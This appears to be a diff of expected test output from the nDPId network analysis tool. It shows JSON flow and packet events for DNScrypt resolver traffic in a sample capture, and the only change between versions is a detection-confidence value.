AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":339,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":45497,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":339,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":45497,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":340,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47729,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":946739318038,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAAXc+3QgAL0Rpj8KAAABl1DeT7pxAbsGBJ0gXC0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAEAAAAAAAAAAAAFvwAMBbsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47729,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":340,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47729,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":341,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739318038} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":341,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAABQ+3MAub0RyxMKAAABl1DeTwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":342,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739318038} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":342,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAABQ+3QAub0RyxIKAAABl1DeTwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 
00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":52040,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":946739318038,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739318038,"pkt":"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"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":52040,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":343,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":52040,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":344,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":57636,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":344,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":946739318038,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAAXc+3YgAL0Rpj0KAAABl1DeT+EkAbsGBHZpXDEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAEAAAAAAAAAAAAFvwAMBbsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":57636,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":344,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":57636,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":345,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739318038} 
00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":345,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739318038,"pkt":"REREREREZmZmZmZmCABFAABQ+3YAub0RyxAKAAABl1DeTwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":346,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":38511,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":946739318038,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739318038,"pkt":"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"} 
-00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":38511,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":346,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318038,"flow_last_seen":946739318038,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318038,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":38511,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":347,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":2,"flow_last_seen":946739318059,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":946739318059,"pkt":"ZmZmZmZmRERERERECABFAADX+4ZAADQRFDOXUN5PCgAAAQG70nQAw+UcXDKBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADbIkde1\/iXw9F8aP3hFzW\/UlCbjrsaMoYt8+MW53XVHmJZ40u2KJ1Y5p9+bOkgm9KOg6J\/Jk5OIIo5rrGKNcsPhxVktS2XlAVyckcTA1HXSkhBDvC7R+LCFU83mg2ymgqHFWS1LZeUBQAAAAFfU5R+X1Tl\/g=="} 00715{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":348,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":946739318059,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":229,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":229,"pkt_l4_len":195,"thread_ts_msec":946739318059,"pkt":"ZmZmZmZmRERERERECABFAADX+4dAADQRFDKXUN5PCgAAAQG7sbkAwwXbXC+BgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAdvcGVubmljBGkycGQDeHl6AAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADbIkde1\/iXw9F8aP3hFzW\/UlCbjrsaMoYt8+MW53XVHmJZ40u2KJ1Y5p9+bOkgm9KOg6J\/Jk5OIIo5rrGKNcsPhxVktS2XlAVyckcTA1HXSkhBDvC7R+LCFU83mg2ymgqHFWS1LZeUBQAAAAFfU5R+X1Tl\/g=="} 
00601{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":349,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":59011,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":349,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":946739318061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739318061,"pkt":"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"} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":59011,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":349,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":59011,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00605{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":350,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739318061,"flow_last_seen":946739318061,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739318061,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":50387,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":350,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":946739318061,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739318061,"pkt":"REREREREZmZmZmZmCABFAAXcXckgAL0RXlcKAAABjgTNL8TTAbsGBCE2qlkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANuczQCY2EFbHVnZ3MCY28AABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA